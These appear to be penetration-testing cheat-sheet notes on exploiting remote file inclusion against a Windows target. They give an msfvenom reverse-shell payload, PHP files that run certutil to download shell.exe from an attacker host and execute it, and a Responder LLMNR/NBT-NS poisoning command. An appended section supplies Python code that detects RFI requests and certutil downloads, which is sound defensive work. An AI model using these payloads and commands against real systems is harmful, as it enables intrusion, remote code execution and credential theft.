RFI
Check
python3 -m http.server 80
http://192.168.45.163/
Get a shell
- Windows
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.45.163 LPORT=4444 -f exe -o shell.exe
mousepad step1.php
<?php
// Runs certutil on the Windows target to fetch shell.exe from the HTTP server started above.
$exec = system('certutil.exe -urlcache -split -f "http://192.168.45.163/shell.exe" shell.exe', $val);
?>
mousepad step2.php
<?php
// Executes the shell.exe that step1.php downloaded.
$exec = system('shell.exe', $val);
?>
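Detection side of the RFI steps above, as an added example that is not part of the original notes: it flags web requests whose query values are remote URLs and process command lines where certutil fetches over HTTP. The access-log format, the "page" parameter name and all sample lines are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed samples. Log format, the "page" parameter and paths are assumptions.
SAMPLE_ACCESS_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /index.php?page=about.php HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2024:10:00:05 +0000] "GET /index.php?page=http%3A%2F%2F192.168.45.163%2Fstep1.php HTTP/1.1" 200 87',
    '10.0.0.9 - - [01/Jan/2024:10:00:09 +0000] "GET /index.php?page=//192.168.45.163/step2.php HTTP/1.1" 200 0',
    '10.0.0.7 - - [01/Jan/2024:10:01:00 +0000] "GET /search?q=what+is+http HTTP/1.1" 200 900',
]
# Constructed process-creation command lines (e.g. from process audit logging).
SAMPLE_CMDLINES = [
    r'certutil.exe -hashfile C:\Temp\setup.exe SHA256',
    'certutil.exe -urlcache -split -f "http://192.168.45.163/shell.exe" shell.exe',
]

REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/')
# A decoded value that starts with a scheme or is protocol-relative.
REMOTE_VALUE = re.compile(r'^(?:(?:https?|ftp):)?//', re.I)
# certutil used as a downloader: -urlcache (or /urlcache) followed by an HTTP(S) URL.
CERTUTIL_FETCH = re.compile(r'certutil(?:\.exe)?\b.*[-/]urlcache\b.*https?://', re.I)


def rfi_hits(lines):
    """Return (client, parameter, decoded value) for query values that are remote URLs."""
    hits = []
    for line in lines:
        m = REQUEST.match(line)
        if not m:
            continue
        client, target = m.groups()
        # parse_qsl percent-decodes, so encoded "http%3A%2F%2F" is caught too.
        for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
            if REMOTE_VALUE.match(value.strip()):
                hits.append((client, name, value))
    return hits


def certutil_downloads(cmdlines):
    """Return the command lines in which certutil fetches a file over HTTP(S)."""
    return [c for c in cmdlines if CERTUTIL_FETCH.search(c)]


if __name__ == "__main__":
    for hit in rfi_hits(SAMPLE_ACCESS_LOG):
        print("possible RFI:", hit)
    for cmd in certutil_downloads(SAMPLE_CMDLINES):
        print("certutil download:", cmd)
```

Legitimate redirect-style parameters also carry URLs, so a hit is worth triaging against whether the parameter reaches an include/require call; with allow_url_include left Off in php.ini, PHP refuses the remote include in the first place.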
Responder LLMNR/NBT-NS/WPAD poisoning attack
sudo responder -I tun0 -wv